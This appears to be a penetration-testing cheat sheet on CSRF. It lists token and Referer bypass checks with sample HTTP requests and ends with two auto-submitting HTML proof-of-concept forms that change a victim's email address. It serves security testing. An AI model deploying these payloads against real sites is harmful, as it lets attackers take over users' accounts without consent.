Shelled

CSRF

Criteria

SameSite Cookie Attribute

The first thing to check in a CSRF attack is the security headers on the session cookie.

SameSite=Strict - CSRF Not Possible
SameSite=LAX - CSRF Only Possible on GET Request
SameSite=NONE - CSRF Possible

No CSRF Token

The most common mistake developers make is not putting a CSRF token.

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;
email=test%40test.com

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;
email=test%40test.com

Reports

CSRF Token Bypasses

CSRF Token is Being Validated

Check if the CSRF token is being validated by changing a single character in the cookie.

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;
email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBA

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;
email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBB

Reports

CSRF Token is Being Checked if Parameter not Present

Check if the CSRF token is being checked if there is no CSRF parameter.

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;
email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBA

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;
email=test%40test.com

Reports

CSRF Token is Being Checked on Different Methods

Check if the CSRF token is being checked if the method is changed.

POST /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;
email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBA

GET /my-account/change-email HTTP/1.1
Host: target.com
Cookie: session=S97qjrvFPqdndlqAidWFbHCldtb2RFP8;
email=test%40test.com&csrf=EFd9BZX3mI6LgxnzJgaa42YMHORbcVBA

Reports

Referer Bypasses

Bad Regex

Some applications make use of the HTTP Referer header to attempt to defend against CSRF attacks, normally by verifying that the request originated from the application's own domain. The following are possible mistakes the developers could make by implementing bad regex for the Referer header based CSRF protection.

1. Bad Regex: Subdomain

https://target.com.shelled.io/change_email

2. Bad Regex: Query Parameter

https://shelled.io/change_email?target.com

Reports

Referer Header Removed

Some applications make use of the HTTP Referer header to attempt to defend against CSRF attacks, normally by verifying that the request originated from the application's own domain. The applications may validate the Referer header when it is present in requests but skip the validation if the header is omitted.

The following code will drop the referer header.

<meta name="referrer" content="never">

PoC

<html>
    <body>
        <meta name="referrer" content="never">
        <form action="https://vulnerable-website.com/email/change" method="POST">
            <input type="hidden" name="email" value="pwned@evil-user.net" />
            <input type="hidden" name="csrf" value="WfF1szMUHhiokx9AHOfjRkE" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>

Reports

PoC

General CSRF PoC

<html>
    <body>
        <form action="https://vulnerable-website.com/email/change" method="POST">
            <input type="hidden" name="email" value="pwned@evil-user.net" />
            <input type="hidden" name="csrf" value="WfF1szMUHhiokx9AHOfjRkE" />
        </form>
        <script>
            document.forms[0].submit();
        </script>
    </body>
</html>